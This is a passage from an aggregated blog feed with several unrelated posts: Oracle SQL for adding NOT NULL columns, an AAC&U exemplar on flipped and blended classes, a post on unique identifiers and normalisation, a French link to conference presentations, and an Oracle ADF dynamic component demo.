alter table dbaperf.has_data modify ( column_three NOT NULL );

Things get easier if you do this with a DEFAULT clause on the new column.  The problem is of course some columns have a reasonable default value others may not get any agreement for a default value.  A min and a max type column probably can have an easy default others not so much.

alter table dbaperf.has_data add ( column_four number(21,2) default 0 NOT NULL );

All of this discussion side steps the implications of adding a new column to a large existing table or partitioned table and fragging up the blocks ... that is a little beyond 101 for now.
Categories: DBA Blogs

AAC&U GEMs: Exemplar Practice

Michael Feldstein - Sat, 2014-04-12 06:04

A while back, I wrote about my early experiences as a member of the Digital Working Group for the AAC&U General Education Maps and Markers (GEMs) initiative and promised that I would do my homework for the group in public. Today I will make good on that promise. The homework is to write-up an exemplar practice of how digital tools and practices can help support students in their journeys through GenEd.

As I said in my original post, I think this is an important initiative. I invite all of you to write up your own exemplars, either in the comments thread here or in your own blogs or other digital spaces.

The template for the exemplar is as follows:

Evocative Examples of Digital Resources and Strategies that can Improve General Education: What are these cases a case of?

Brief Description of practice:

  • In what ways is the practice effective or transformative for student learning? What’s the evidence? How do we know? (If you can tie the practice to any of the outcomes in the DQP and/or the LEAP Essential Learning Outcomes, that would be great.)
  • How does the practice reflect the digital world as lived student culture? What are the skills and content associated with the digital practice or environment? How does the practice deepen or shape behavior of students with digital tools and environments with which they may be variously familiar?
  • What does it take to make the practice work? What is the impact on faculty time? Does it take a team to design, implement, assess? What are the implications for organizational change?
  • How is it applicable to gen ed (if example doesn’t come from gen ed)?
  • Are there references or literature to which you can point that is relevant to the practice?

I decided to base my exemplar on the MSU psychology class that I’ve written about recently.

Flipped and Blended Class with Homework Platform Support

In this practice, every effort is made to move both direct instruction and formative assessment outside of class time. The “flipped classroom” (or “flipped learning”) approach is employed, providing students with instructional videos and other supplemental content. In addition, a digital homework platform is employed, enabling students to get regular formative assessments. In order to give students more time for these activities, the amount of in-class time is reduced, making the course effectively a blended or hybrid course. In-class time is devoted either to class discussion, which is supported by the instructor’s knowledge of the students’ performance on the regular formative assessments, and by group work.

In what ways is the practice effective or transformative for student learning? What’s the evidence? How do we know?

This is a particular subset of a practice that the National Center for Academic Transformation (NCAT) calls “the replacement model”, and they have a variety of course redesign projects that demonstrated improved outcomes relative to the control. For example, a redesign of a psychology Gen Ed course at Missouri State University produced the following results:

  • On the 30-item comprehensive exam, students in the redesigned sections performed significantly better (84% improvement) compared to the traditional comparison group (54% improvement).
  • Students in the redesigned course demonstrated significantly more improvement from pre to post on the 50-item comprehensive exam (62% improvement) compared to the traditional sections (37% improvement).
  • Attendance improved substantially in the redesigned section. (Fall 2011 traditional mean percent attendance = 75% versus fall 2012 redesign mean percent attendance = 83%)
  • Over a three-semester period following the redesign, the course DFW rate improved from 24.6% to 18.4% (most of which was because of a significant drop in the withdrawal rate).

One of the investigators of the project, who also was a course instructor, indicated that the quality of class discussion improved significantly as well.

Possible reasons why the practice is effective include the following:

  • Teacher/student contact time is maximized for interactivity.
  • Regular formative assessments with instant feedback help students to be better prepared to maximize discussion time with the teacher and with peers.
  • Feedback from the homework system enabled the instructor to walk into class knowing where students need the most help.
  • Reduced number of physical class meetings reduces the chances that a student will withdraw due to grade damaging absences.

How does the practice reflect the digital world as lived student culture? What are the skills and content associated with the digital practice or environment? How does the practice deepen or shape behavior of students with digital tools and environments with which they may be variously familiar?

Students are used to getting their information online. They are also often very effective at “time slicing,” in which they use small increments of time (e.g., when they are on a bus or waiting for an appointment) to get things done. This exemplar practice enables students to do that with the portions of academic work that are suited to it while preserving and actually expanding room for long and deep academic discussion.

What does it take to make the practice work? What is the impact on faculty time? Does it take a team to design, implement, assess? What are the implications for organizational change?

The redesign effort is significant and, because the creation of significant digital resources is involved, is often best done by a team (although that is not strictly necessary). For the purposes of this design, the homework platform need not be cutting-edge adaptive, as long as it provides formative assessments that are consistent with the summative assessments and provides both students and instructors with good, regular feedback. That said, implementing the technology is often not seamless and may take several semesters to work the kinks out. The shift to a flipped classroom also puts new demands on students and may take several semesters for the campus culture to adjust to the new approach.

How is it applicable to gen ed (if example doesn’t come from gen ed)?

This model is often used in Gen Ed. It is particularly appropriate for larger classes where the DFW rate is high and where a significant percentage of the subject matter—at least the foundational knowledge on the lower rungs of Bloom’s taxonomy—can be assessed through software.

Are there references or literature to which you can point that is relevant to the practice?

http://mfeldstein.com/efficacy-adaptive-learning-flipped-classroom/

http://mfeldstein.com/efficacy-adaptive-learning-flipped-classroom-part-ii/

http://www.thencat.org/PlanRes/R2R_Model_Rep.htm

http://www.thencat.org/PCR/R3/TCC/TCC_Overview.htm

http://www.flippedlearning.org/

The post AAC&U GEMs: Exemplar Practice appeared first on e-Literate.

Unique identifiers - but what do they identify

Gary Myers - Fri, 2014-04-11 22:39
Most of the readers of this blog will be developers, or DBAs, who got the rules of Normalisation drummed into them during some phase of the education or training. But often we get to work with people who don't have that grounding. This post is for them. Feel free to point them at it.

Through normalisation, the tendency is to start with a data set, and by a methodical process extract candidate keys and their dependent attributes. In many cases there isn't a genuine or usable candidate key and artificial / surrogate keys need to be generated. While your bank can generally work out who you are based on your name and address, either of those could change and so they assign you a more permanent customer or account number.

The difficulty comes when those identifiers take on a life of their own. 

Consider the phone number. When I dial my wife's phone number, out of all the phones in Australia (or the world), it is her's alone that will ring. Why that one ? 

In the dark ages, the phone number would indicate a particular exchange and a copper wire leading out of that exchange hard wired to a receiver (or a set of receivers in the case of Party Lines).  Now all the routing is electronic, telephones can be mobile and the routing for calls to a particular number can be changed in an instant. A phone number no longer identifies a device, but a service, and a new collection of other identifiers have risen up to support the implementation of that service. An IMEI can identify a mobile handset and the IMSI indicates a SIM card from a network provider, and we can change the SIM card / IMSI that corresponds to a phone number, or swap SIM cards between handsets. Outside the cellular world, VOIP can shunt 'phone number' calls around innumerable devices using IP addresses. 

Time is another factor. While I may 'own' a given phone number at a particular time, I may give that up and someone else might take it over. That may get represented by adding dates, or date ranges to the key, or it can be looked at as a sequence. For example, Elizabeth Taylor's husband may indicate one of seven men depending on context. The "fourth husband" or "her husband on 1st Jan 1960" would be Eddie Fisher.

Those without a data modelling background that includes normalisation may flinch at the proliferation of entities and tables in a relational environment. As developers and architects look at newer technologies some of the discipline of the relational model will be passed over. Ephemeral transactions can cluster the attributes together in XML or JSON formats with no need for consistency of data definitions beyond the period of processing. Data warehousing quickly discarded relational formats in favour of 'facts' and 'dimensions'. 

The burden of managing a continuous and connected set of data extending over a long period of time, during which the identifiers and attributes morph, is an ongoing challenge in database design.

Complément : Régionales 2014 ... les présentations

Jean-Philippe Pinte - Fri, 2014-04-11 22:12
Retrouvez les présentations faites lors des Régionales 2014 :


Dynamic ADF Forms with the new Dynamic Component (and synch with DB)

Shay Shmeltzer - Fri, 2014-04-11 17:22

I wrote a couple of blogs in the past that talked about creating dynamic UIs based on a model layer that changes (example1 example2). Well in 12c there is a new ADF Faces component af:dynamicComponent that makes dynamic forms even more powerful. This component can be displayed as various UI components at runtime. This allows us to create Forms and tables with full functionality in a dynamic way.

In fact, we use this when you create either a form or a table component in your JSF page dragging over a data control. We now allow you to not specify each field in your UI but just say that you want to show all the fields in the data control.

In the demo below I show you how this is done, and then review how your UI automatically updates when you add fields in your model layer. For example if your DB changed and you used the "Synchronize with DB" and added the field to the VO - that's it no more need to go to every page and add the new field.

Check it out:

<span id="XinhaEditingPostion"></span>

Categories: Development